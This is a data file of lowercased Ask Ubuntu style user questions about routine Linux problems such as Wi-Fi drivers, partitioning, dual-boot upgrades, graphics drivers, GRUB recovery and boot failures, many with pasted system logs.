453963	wifi stopped working after kernel panic	please note : i 'm writing this on a j2me se hazel , so i 'll make this short , but the spelling nor the styling wo n't be great . system : ubuntu 12.04 lts wubi install on m $ windows vista ( do n't ask why ) . 2.2 ghz 1 core amd cpu , approx . 744 mb ram . unity was slow because of the ram , so i installed lubuntu-desktop , was happy with it for 2 months , until today . to get the wifi working , i had to install some kind of additional driver ( through the settings window ) . lan does n't work , but that 's a different topic . what happened : i had a couple of programs running : pidgin , skype , keepassx ( i think ) and , most importantly , the settings manager . in it i clicked `` language manager '' ( or something like that ) . it said it needed to update some translations , so i clicked ok , and continued messing with the settings . and then it happened . the screen turned to console . it was full of text , and at the bottom there said something like kernel panic , going to text console . alas , i have n't got a photo . after finding out that the kernel panic is something like the win blue screen , i hard rebooted . on booting the wifi did n't work . i triedthe troubleshoot guide in the ubuntu help , in vain . i tried vista , does n't work there neither . in the device manager it shows a warning icon on it , and simply says device unable to load ( code 10 ) . please do n't say at this point that it 's not an ubuntu problem , and that i should ask it somewhere else . ubuntu created this problem , so i will at least try it here . if you want more info , just ask . thanks .
453967	can someone explain partitions to me ?	i 'm installing lubuntu and i and dual-booting it with windows 7 . i want to be able to access all files while using either os . my hard drive has 4 partitions , sda1 200mb 'windows 7 ( loader ) ' , sda2 480gb 'window 7 ( loader ) ' , sda3 18gb 'windows recovery ' ( or something close to that ) , sda4 100mb and no 'system ' on it . 1,2 and 3 are all 'ntfs ' ( i think it was ) and sda4 is fat32 . i do n't know what fat32 or ntfs mean , so can 1 ) someone explain what fat32/ntfs mean and do . 2 ) how i can make files on the biggest partition ( sda2 480 gb 'windows 7 ( loader ) ' ) , available to both operating systems . bare in mind i am completely new to this area of computing and have next to no idea what i 'm doing . thank you : d
453968	how to change a share folders name	i 'm pretty new to ubuntu and i 've been following lots of videos on youtube however , i 've come across a small problem . i 've created a shared folder which works fine however i 'm not happy with the name i 've given it therefore i want to change the name . how ?
453969	how can i order gnome3 shell extensions at the top ?	the ordering of shell extension widgets appears to be random , how can i change it ? i want to have the date/time information at the left for example . my shell panel :
453976	upgrading 13.10 to 14.04 alongside a windows 7 installation	i have dual boot on my laptop : - windows 7 with ubuntu 13.10 installed alongside . how do i upgrade my ubuntu installation to 14.04 without affecting the windows installation ?
453977	gtk application font problem with some characters in kubuntu	i have problem with fonts in gtk applications in kubuntu 14.04 ( problem was in 13.10 too ) . some characters are rendered by another font . problem is with all gtk applications . problem is with all local character and with some other characters like e or d. problem is not with settings in gtkrc file . i tried with this file everything . i tried to create a new user and this new user has the same problem with fonts in gtk . qt application are ok. screenshots : pidgin chromium
453984	14.04 installation - the partiton table format in use on your disk	i was trying to upgrade to 14.04 from 12.04 . i made usb disk using startup disk creator . then restarted and when installing i selected `` upgrade from ubuntu 12.04 lts to ubuntu 14.04 lts '' . then i clicked install i got this message here is the image and my partiton table looks like this ubuntu @ ubuntu : ~ $ sudo parted -l model : ata wdc wd10jpvt-60a ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 420mb 419mb ntfs ba hidden 2 420mb 693mb 273mb fat32 ef boot 3 693mb 827mb 134mb mi msftres 8 827mb 10.8gb 10.0gb linux-swap ( v1 ) 9 10.8gb 120gb 109gb ext4 msftdata 4 120gb 442gb 322gb ntfs msftdata 5 442gb 710gb 268gb ntfs msftdata 6 710gb 974gb 264gb ntfs msftdata 7 974gb 1000gb 25.8gb ntfs ba hidden , msftdata model : jetflash transcend 16gb ( scsi ) disk /dev/sdb : 15.8gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 16.4kb 15.8gb 15.8gb primary fat32 boot , lba
453985	install kernel 2.6.x headers on a 3.11 machine and build driver using 2.6	i have a proprietary sdk for an embedded device which was built with linux kernel 2.6.32 and is dependent upon its headers . with newer kernel ( 3.11.x ) it fails to build complaining about missing several data structures . i am trying to install 2.6.x headers only ( and source if required ) on a 3.11 kernel machine . is that possible ? any advice into how do i go about doing that ? update : my code goes inside attempts to make from following : -c /lib/modules/3.11.0-12-generic/build subdirs=pwd modules ; make [ 2 ] : entering directory `/usr/src/linux-headers-3.11.0-12-generic i need to tell it to use 2.6.x instead .
453987	broken dependencies while installing redmine using apt on fresh 14.04	on vanilla 14.04 : run aptitude chose package redmine see broken conflicting package problem ( something with ruby-rack ) how can i deal with it ?
453988	ubuntu thinks i have a manually installed driver	ubuntu seems to think i have a manually installed driver when i am using the default drivers ( nouveau ) and therefore i can not switch to the other nvidia drivers . i want to install them this way and not manually so is there any way i can make ubuntu realise i do not have any manually installed drivers .
453993	.ubuntu 14.04 ip6 timed out	i have ubuntu 14.04 when i try to connect to a router it connecting properly but there is no internet access . i recently read the syslog and found this lines ... please tell me what does it mean `` ip6 timed out '' and how to fix it . syslog : apr 23 19:31:30 iq-gst-box networkmanager [ 1003 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . apr 23 19:31:30 iq-gst-box networkmanager [ 1003 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 23 19:31:30 iq-gst-box networkmanager [ 1003 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 23 19:31:30 iq-gst-box networkmanager [ 1003 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . and this ifconfig -a output : eth0 link encap : ethernet hwaddr 24 : b6 : fd:38:4d : a5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:5269 errors:0 dropped:0 overruns:0 frame:0 tx packets:5269 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:662504 ( 662.5 kb ) tx bytes:662504 ( 662.5 kb ) wlan0 link encap : ethernet hwaddr 64:27:37 : e6:68 : d9 inet addr:192.168.0.103 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6627:37ff : fee6:68d9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:570615 errors:0 dropped:0 overruns:0 frame:522545 tx packets:463960 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:729850876 ( 729.8 mb ) tx bytes:42401358 ( 42.4 mb ) interrupt:17 nm-tool output : networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 24 : b6 : fd:38:4d : a5 capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ iq-gst-box ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : wl state : connected default : yes hw address : 64:27:37 : e6:68 : d9 capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *iq-gst-box : infra , 10 : fe : ed : c8 : ae:5a , freq 2452 mhz , rate 54 mb/s , strength 32 wpa wpa2 iq-gst-box : infra , 00:27:22:4c:0e:06 , freq 2422 mhz , rate 54 mb/s , strength 24 ipv4 settings : address : 192.168.0.103 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 thanks ...
453994	ca n't connect to wifi nor detect connections	i had an issue with my laptop in which whenever used ubuntu connected to wifi , every other device on the same connection would slow to an unusable place . i researched and found someone else had this issue , and the solution there was to run the following : sudo sh -c `` echo 'blacklist wl ' > > /etc/modprobe.d/broadcomm-blacklist.conf sudo sh -c `` echo 'brcmsmac ' > > /etc/modprobe.d/broadcomm.conf being dumb , i did that without fully understanding the consequences/what i was doing , and now my laptop can not detect wifi connections at all . i suppose i have disabled my driver , though i have no idea how to get it working again . after the fact , i noticed someone in the comments of the post i mention above warns against this very thing happening -- > my fault ! any help is appreciated .
453999	ati ( amd ) hd7750 proprietary drivers flickers and falls back to vesa	i have recently upgraded my working x86_64 13.10 system to 14.04 . however , when using the proprietory amd drivers , gnome ( not tested with unity ) flickers and falls back to vesa . the graphics hardware is : damien @ damien-desktop : ~ $ lspci | grep ati 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 10h processor hypertransport configuration 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] cape verde pro [ radeon hd 7750 / r7 250e ] 02:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) the following errors can be seen in the xorg log : damien @ damien-desktop : ~ $ cat /var/log/xorg.0.log | grep ee ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 140.075 ] initializing built-in extension mit-screen-saver [ 140.108 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 140.795 ] ( ee ) aiglx error : failed to open /usr/x11r6/lib64/modules/dri/fglrx_dri.so , error [ /usr/x11r6/lib64/modules/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] [ 140.795 ] ( ee ) aiglx error : failed to open /usr/lib64/dri/fglrx_dri.so , error [ /usr/lib64/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] [ 140.795 ] ( ee ) aiglx error : failed to open /usr/x11r6/lib/modules/dri/fglrx_dri.so , error [ /usr/x11r6/lib/modules/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] the offending file can be found , but is in the wrong spot : damien @ damien-desktop : ~ $ find /usr | grep 'fglrx_dri.so' /usr/lib32/fglrx/dri/fglrx_dri.so /usr/lib/fglrx/dri/fglrx_dri.so /usr/lib/dri/fglrx_dri.so the driver reports itself as follows : damien @ damien-desktop : ~ $ dmesg | grep -i ati [ 3.942522 ] fglrx : module license 'proprietary . ( c ) 2002 - ati technologies , starnberg , germany ' taints kernel . [ 3.977331 ] fglrx : module verification failed : signature and/or required key missing - tainting kernel [ 4.006431 ] input : hda ati sb front headphone as /devices/pci0000:00/0000:00:14.2/sound/card0/input15 [ 4.006518 ] input : hda ati sb line out side as /devices/pci0000:00/0000:00:14.2/sound/card0/input14 [ 4.006627 ] input : hda ati sb line out clfe as /devices/pci0000:00/0000:00:14.2/sound/card0/input13 [ 4.006667 ] input : hda ati sb line out surround as /devices/pci0000:00/0000:00:14.2/sound/card0/input12 [ 4.006839 ] input : hda ati sb line out front as /devices/pci0000:00/0000:00:14.2/sound/card0/input11 [ 4.006945 ] input : hda ati sb line as /devices/pci0000:00/0000:00:14.2/sound/card0/input10 [ 4.007023 ] input : hda ati sb rear mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input9 [ 4.007075 ] input : hda ati sb front mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input8 [ 4.015326 ] input : hda ati hdmi hdmi/dp , pcm=11 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card2/input21 [ 4.015410 ] input : hda ati hdmi hdmi/dp , pcm=10 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card2/input20 [ 4.015472 ] input : hda ati hdmi hdmi/dp , pcm=9 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card2/input19 [ 4.015854 ] input : hda ati hdmi hdmi/dp , pcm=8 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card2/input18 [ 4.016008 ] input : hda ati hdmi hdmi/dp , pcm=7 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card2/input17 [ 4.016132 ] input : hda ati hdmi hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:02.0/0000:01:00.1/sound/card2/input16 the first few lines of the xorg.log which shows the versions of the drivers and servers are : damien @ damien-desktop : ~ $ cat /var/log/xorg.0.log | head -150 [ 140.073 ] x.org x server 1.15.1 release date : 2014-04-13 [ 140.073 ] x protocol version 11 , revision 0 [ 140.073 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 140.073 ] current operating system : linux damien-desktop 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 [ 140.073 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-24-generic root=uuid=66cfd47c-d1eb-4f45-9a4b-0a6ea079fe90 ro quiet splash nomdmonddf nomdmonisw vt.handoff=7 [ 140.073 ] build date : 16 april 2014 01:36:29pm [ 140.073 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 140.073 ] current version of pixman : 0.30.2 [ 140.073 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 140.073 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 140.074 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu apr 24 06:28:36 2014 [ 140.074 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 140.074 ] ( == ) no layout section . using the first screen section . [ 140.074 ] ( == ) no screen section available . using defaults . [ 140.074 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 140.074 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 140.074 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 140.074 ] ( == ) automatically adding devices [ 140.074 ] ( == ) automatically enabling devices [ 140.074 ] ( == ) automatically adding gpu devices [ 140.074 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 140.074 ] entry deleted from font path . [ 140.074 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 140.074 ] entry deleted from font path . [ 140.074 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 140.074 ] entry deleted from font path . [ 140.074 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 140.074 ] entry deleted from font path . [ 140.074 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 140.074 ] entry deleted from font path . [ 140.074 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 140.074 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 140.074 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 140.074 ] ( ii ) loader magic : 0x7f6fc74e5d60 [ 140.074 ] ( ii ) module abi versions : [ 140.074 ] x.org ansi c emulation : 0.4 [ 140.074 ] x.org video driver : 15.0 [ 140.074 ] x.org xinput driver : 20.0 [ 140.074 ] x.org server extension : 8.0 [ 140.075 ] ( -- ) pci : * ( 0:1:0:0 ) 1002:683f:174b : e213 rev 0 , mem @ 0xd0000000/268435456 , 0xfde80000/262144 , i/o @ 0x0000de00/256 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 140.075 ] initializing built-in extension generic event extension [ 140.075 ] initializing built-in extension shape [ 140.075 ] initializing built-in extension mit-shm [ 140.075 ] initializing built-in extension xinputextension [ 140.075 ] initializing built-in extension xtest [ 140.075 ] initializing built-in extension big-requests [ 140.075 ] initializing built-in extension sync [ 140.075 ] initializing built-in extension xkeyboard [ 140.075 ] initializing built-in extension xc-misc [ 140.075 ] initializing built-in extension security [ 140.075 ] initializing built-in extension xinerama [ 140.075 ] initializing built-in extension xfixes [ 140.075 ] initializing built-in extension render [ 140.075 ] initializing built-in extension randr [ 140.075 ] initializing built-in extension composite [ 140.075 ] initializing built-in extension damage [ 140.075 ] initializing built-in extension mit-screen-saver [ 140.075 ] initializing built-in extension double-buffer [ 140.075 ] initializing built-in extension record [ 140.075 ] initializing built-in extension dpms [ 140.075 ] initializing built-in extension present [ 140.075 ] initializing built-in extension dri3 [ 140.075 ] initializing built-in extension x-resource [ 140.075 ] initializing built-in extension xvideo [ 140.075 ] initializing built-in extension xvideo-motioncompensation [ 140.075 ] initializing built-in extension selinux [ 140.075 ] initializing built-in extension xfree86-vidmodeextension [ 140.075 ] initializing built-in extension xfree86-dga [ 140.076 ] initializing built-in extension xfree86-dri [ 140.076 ] initializing built-in extension dri2 [ 140.076 ] ( ii ) loadmodule : `` glx '' [ 140.076 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/extensions/libglx.so [ 140.076 ] ( ii ) module glx : vendor= '' advanced micro devices , inc. '' [ 140.076 ] compiled for 6.9.0 , module version = 1.0.0 [ 140.076 ] loading extension glx [ 140.076 ] ( == ) matched fglrx as autoconfigured driver 0 [ 140.076 ] ( == ) matched ati as autoconfigured driver 1 [ 140.076 ] ( == ) matched modesetting as autoconfigured driver 2 [ 140.076 ] ( == ) matched fbdev as autoconfigured driver 3 [ 140.076 ] ( == ) matched vesa as autoconfigured driver 4 [ 140.076 ] ( == ) assigned the driver to the xf86configlayout [ 140.076 ] ( ii ) loadmodule : `` fglrx '' [ 140.076 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so [ 140.090 ] ( ii ) module fglrx : vendor= '' firegl - amd technologies inc. '' [ 140.090 ] compiled for 1.4.99.906 , module version = 13.35.5 [ 140.090 ] module class : x.org video driver [ 140.090 ] ( ii ) loading sub module `` fglrxdrm '' [ 140.090 ] ( ii ) loadmodule : `` fglrxdrm '' [ 140.090 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/linux/libfglrxdrm.so [ 140.090 ] ( ii ) module fglrxdrm : vendor= '' firegl - amd technologies inc. '' [ 140.090 ] compiled for 1.4.99.906 , module version = 13.35.5 [ 140.090 ] ( ii ) loadmodule : `` ati '' [ 140.090 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 140.090 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 140.090 ] compiled for 1.15.0 , module version = 7.3.0 [ 140.090 ] module class : x.org video driver [ 140.090 ] abi class : x.org video driver , version 15.0 [ 140.090 ] ( ii ) loadmodule : `` radeon '' [ 140.091 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 140.091 ] ( ii ) module radeon : vendor= '' x.org foundation '' [ 140.091 ] compiled for 1.15.0 , module version = 7.3.0 [ 140.091 ] module class : x.org video driver [ 140.091 ] abi class : x.org video driver , version 15.0 [ 140.091 ] ( ii ) loadmodule : `` modesetting '' [ 140.092 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 140.092 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 140.092 ] compiled for 1.15.0 , module version = 0.8.1 [ 140.092 ] module class : x.org video driver [ 140.092 ] abi class : x.org video driver , version 15.0 [ 140.092 ] ( ii ) loadmodule : `` fbdev '' [ 140.092 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 140.092 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 140.092 ] compiled for 1.15.0 , module version = 0.4.4 [ 140.092 ] module class : x.org video driver [ 140.092 ] abi class : x.org video driver , version 15.0 [ 140.092 ] ( ii ) loadmodule : `` vesa '' [ 140.092 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 140.092 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 140.092 ] compiled for 1.15.0 , module version = 2.3.3 [ 140.092 ] module class : x.org video driver [ 140.092 ] abi class : x.org video driver , version 15.0 [ 140.092 ] ( ii ) amd proprietary linux driver version identifier:13.35.5 [ 140.092 ] ( ii ) amd proprietary linux driver release identifier : unsupported-13.35.1005 [ 140.092 ] ( ii ) amd proprietary linux driver build date : mar 12 2014 10:32:23 [ 140.092 ] ( ii ) radeon : driver for ati radeon chipsets : ati radeon mobility x600 ( m24 ) 3150 ( pcie ) , ati firemv 2400 ( pci ) , ati radeon mobility x300 ( m24 ) 3152 ( pcie ) , ati firegl m24 gl 3154 ( pcie ) , ati firemv 2400 3155 ( pci ) , ati radeon x600 ( rv380 ) 3e50 ( pcie ) , ati firegl v3200 ( rv380 ) 3e54 ( pcie ) , ati radeon igp320 ( a3 ) 4136 , ati radeon igp330/340/350 ( a4 ) 4137 , ati radeon 9500 ad ( agp ) , ati radeon 9500 ae ( agp ) , ati radeon 9600tx af ( agp ) , ati firegl z1 ag ( agp ) , ati radeon 9800se ah ( agp ) , ati radeon 9800 ai ( agp ) , ati radeon 9800 aj ( agp ) , ati firegl x2 ak ( agp ) , ati radeon 9600 ap ( agp ) , ati radeon 9600se aq ( agp ) , ati radeon 9600xt ar ( agp ) , ati radeon 9600 as ( agp ) , ati firegl t2 at ( agp ) , ati radeon 9650 , ati firegl rv360 av ( agp ) , ati radeon 7000 igp ( a4+ ) 4237 , ati radeon 8500 aiw bb ( agp ) , ati radeon igp320m ( u1 ) 4336 , ati radeon igp330m/340m/350m ( u2 ) 4337 ,
454000	ubuntu 14 desktop install failed and corrupted grub	long story : tried to install ubuntu 14.04 desktop . 12 already installed . dual boot system with vista . install failed . now i can not boot to either 14 or vista . grub rescue only prompt available . tried sudo add-apt-repsotitory ppa : yannubuntu/boot repair . it could not find boot repair tried update . no go . tried install . no go . ubuntu will not install again either . desperately need to get windows back . files system shows windows system intact . grub seems to be the issue .
454004	gnome shell grey screen no login box after amd drivers installation on lubuntu	i installed the fglrx amd drivers on lubuntu and rebooted . the machine did n't reboot properly and i could only see a prompt . i logged in and uninstalled the drivers using sudo apt-get remove fglrx* i then issued the command sudo rm /etc/x11/xorg.conf and then sudo reboot the machine now boots but only to a grey gnome shell screen that does n't show me the login window with my username and a sign in button . just a blank grey screen . how can i fix this and also get the fglrx drivers working ?
454005	how do i upgrade wine in ubuntu 12.04	i am trying to run windows office 2007 enterprise on ubuntu 12.04 . i have been able to launch and write something on it . but it crashes when i try to save anything . since office 2007 has got a good score , i think the problem is in my current version of wine ( 1.4 ) . maybe i shall upgrade it to wine 1.6 , but i do n't know how . i have made some research and i did n't find anything helpful . could you please help me ? ! thank you
454006	install 14.04 seems frozen at any questions screen	installing ubuntu 14.04 seems frozen at the `` any questions ? '' logo . the little circle thing is still going around , but i ca n't tell if it is doing anything . does it take a long time to erase the old stuff on the hd while installing new os ?
454007	do i need to reinstall everything to upgrade from 13.10 to 14.10 ?	the title almost explains it all . if i update from 13.10 to 14.10 , do i need to reinstall software such as apache , php , filezilla and everything i 've already installed ? i 've recently moved to ubuntu and i would n't like to go through that process again .
454008	cannon mp140 set up	anyone help me please . i want to install my canon printer-scanner mp140 with ubuntu with results so far . i ca n't print excel , words , pdf documents .
454010	maas import boot image error : connection refused	i installed ubuntu 14.04 when i run sudo maas-import-pxe-files i 'll get this error : connectionerror : httpconnectionpool ( host='maas.ubuntu.com , port=80 ) : max retries exceeded with url : /images/ephemeral-v2/releases/streams/v1/index.json ( caused by < class'socket : error ' > [ errno 111 ] connection refused ) or when i click 'import boot images ' nothing downloaded ! i this cas you must config the network on maas setting page . i think it is better to return back a better error in log , something like check you proxy ! !
454011	dropbox and libreoffice do n't like my icelandic file names ( elementary os , ubuntu 12.04 )	i have some strange bugs possibly related to character encoding or problems with filenames , here are some clues : clue # 1 : libreoffice writer 4.1 wo n't open files with icelandic characters in the file name ( f.ex . ritgerð.doc and skýrsla.docx ) but when i change the name to ritgerd.doc or skyrsla.docx can open the files and save without any problems . clue # 2 : dropbox wo n't sync files with icelandic characters in the file name . and as with libreoffice , if i rename the files they will be synced . clue # 3 : shortly after i got the other bugs ( but only like one day later ) , the icelandic keys on my keyboard stopped being icelandic in google chrome beta ( `` æ '' became `` ; '' ) , event though i had the right keyboard layout installed . i switched to google chrome stable and di n't encounter this after that . clue # 4 : this seems to have happened after i used the apt-get autoremove command . does anyone have an idea about what is going on ? [ update ] i am using ext2 filesystem and when i try to open files with icelandic characters in their file names i get an error from libreoffice saying that `` /home/traustid/dropbox/sagnagrunnur/skￃﾽrsla og ritgerￃﾰ - heimildaskrￃﾡ.doc does not exist . '' ( with icelandic characters really messed up ) .
454013	help with partitions ( probably rather simple but i need help )	ok so essentially i reduced the size in a partition in my hard drive . i am installing lubuntu and need it for that . now it says that space is unusuable . if you need more info , ask me .
454016	problems with usb ports	i 've recently installed xubuntu 14.04 lts on my toshiba c55 ( it has 3 usb ports , 1 usb2 on the left side and 1 usb2 and 1 usb3 on the right side ) . my mouse is connected on the right . the problem is that sometimes the right usb ports stop working . after a couple of restarts all is going fine . i 've tried to see some differences with lsusb and sudo fdisk -l when connecting and disconnecting the mouse and a flash drive from these ports , but there are n't any .
454017	can not install ubuntu ( message about pae )	i received the error message below on the black terminal screen after waiting for a reboot.. i tried to find `` forcepae '' in the available options but could n't . can anyone please help ? error : pae is disabled on this pentium m ( pae can potentially be enabled with kernel parameter '' forcepae '' - this is unsupported , may cause unknown problems , and will taint the kernel ) this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu
454025	problem connecting firebird in ubuntu 12.04 lts 64-bit	i installed ubuntu 12.04 lts 64-bit on a pc i built recently , i installed firebird 2.5-classic , then flamerobin ( open-source database administration tool for firebird ) , these packages appeared to install correctly , but when i opened flamerobin , registered an existing database and attempted to connect , i got the following error message : *** ibpp : :sqlexception *** context : database : :connect message : isc_attach_database failed sql message : -902 unsuccessful execution caused by a system error that precludes successful execution of subsequent statements engine code : 335544344 engine message : i/o error during `` open '' operation for file `` /home/servidorcanario/erp/db/arevalo.fdb '' error while trying to open file permission denied i can connect with isql-fb , and i configured firebird with dpkg-reconfigure ( password & user ) , but i really do not understand why i got the error , if the database is indeed there and is not corrupt , and i have already checked it by connecting it to another pc that i have that is running windows 7 . thanks in advance .
454026	desktop link to file on second hard drive broken after reboot	i 'm using a second hard drive to hold most of my data files . links to files and folders on the second drive from all locations on my first drive , where ubuntu 14.04 is installed , work , except that after a reboot links on the desktop are broken . links in my home folder remain valid , which is strange since the desktop is a sub-folder of my home folder . i mount the second drive in the startup applications app . this is different behaviour from 13.10 ( and older releases ) where the desktop links persisted after reboots .
454027	ubuntu 12.10 keylog problem	i have ubuntu 12.10 running and i want to do keylog so i did the following : sudo apt-get update sudo apt-get install logkeys sudo logkeys âs âo /home/user/desktop/output.log it creates a log file but it does not log any thing . i am very new to ubuntu , and any help would be greatly appreciated . i am using ubuntu on a laptop .
454030	which version should i use for i3-2100 ?	i know there are a plethora of people asking this question because i 've read a number of them and am still confused . i have an i3-2100 with 16gb of memory , and an i5-560m with 4gb in a different computer . if i want full 64 bit processor support , and full memory support , should i be using the amd64 or the intel x86 ? i 've been using the amd64 because i saw 64 and assumed that 's the one i want for my 64 bit processor . however , reading the descriptions , it sounds like i may have wanted to use the other one . i figured if i used the wrong one it just would n't install . which one is the correct version for my uses ?
454036	can i install ubuntu/run ubuntu live cd on an imac g4 powermac6,1 without access to os x	i have an imac g4 powermac6,1 which has already seen some years and i would like to install ubuntu on it ( any version ) by overwriting the current os x installation which i ca n't and do n't want to access in any kind of recovery mode or something ( no passwords and no intention to get in touch with the system ) . is there any change i can get into an ubuntu live session or a more rudimentary form of installation ( the really prefer the former in order to be able to make a dd backup of the disk easily ) ? i 've tried so far ( pressing left alt key before boot sound to get boot device selection menu ) : booting with usb stick inserted created with usb-creator-gtk with 16 gb usb stick ( creates 1 partition fat32 , boot and lba partition flag and installs grub bootloader ) with 14.04 amd64 ( not using the mac version as the download redirected me to the same file as default amd64 version and i do n't see mac version available e.g . on http : //mirror.serverloft.eu/ubuntu/releases/14.04/ ) with 2 gb persitence with 14.04 i386 without persistence booting with usb stick inserted with image of 14.04 amd64 and i386 copied to stick with sudo dd if=/dev/loopx of=/dev/sdd ( iso image mounted on loop device ) with mac and gpt partition table boot device selection menu appears in some cases , in others not , but usb stick is never listed ( only the primary hard drive ) . i know that there 're a lot of solutions for installation with access to mac os x ( e.g . with creation of usb stick on mac ) ! update ( after @ blottobot 's answer ) : i tried ubuntu 12.04 , 13.04 and lubuntu 14.04 with powerpc architecture from cd or dvd and it got recognized at boot . unfortunately it gets stuck after . as recommended in the boot screen it tried both simply hiting return enter live video=ofonly and hiting return the made a photo of the output and hope it helps ( please comment if you need a transcription ) after the photographed output on the screen it turns white for ever ( > 10 min checked for every os ) update 2 : ubuntu 14.04 server with powerpc architecture works , i.e . gets beyond the white loading screen ( with a blinding yellow screen ) . what could that mean ? can i - after installing from 14.04 server live cd - install the packages i would have gotten from a desktop live cd by installing e.g . ubuntu-desktop ? update 3 : i can boot from an usb stick with lubuntu 14.04 , but the behavior is the save as for the live cd ( which screen ) , i also tried custom boot command live video=radeonfb:1440x900-16 @ 60 from the ubuntuforums.org thread , but it does n't work ( because i do n't have a mac mini , maybe someone knows the right boot command for me ) .
454037	disk drive boot problem	when i started ubuntu , i got this error : the disk drive for /tmp is not ready yet or is not present ! i tried skipping mounting , but it came up like a command prompt . please help me .
454038	ca n't access menu bar in 14.04 with multiple displays	my main window ca n't click on the menu bar options ( file , edit , view , etc . ) for any program that is on my laptop ( my main display ) when i have another monitor plugged in . this only happened after i upgraded to 14.04 . i 've looked through system settings to see if there was a new option to adjust , but i could only find the one that either puts the options on the top of the program window or the top menu bar . with programs like sublimetext , i ca n't access the menu options if they 're not in the top menu . laptop display ( ca n't click for dropdown menu ) : external monintor display ( caught it just before fade out , but the dropdown menu works ) :
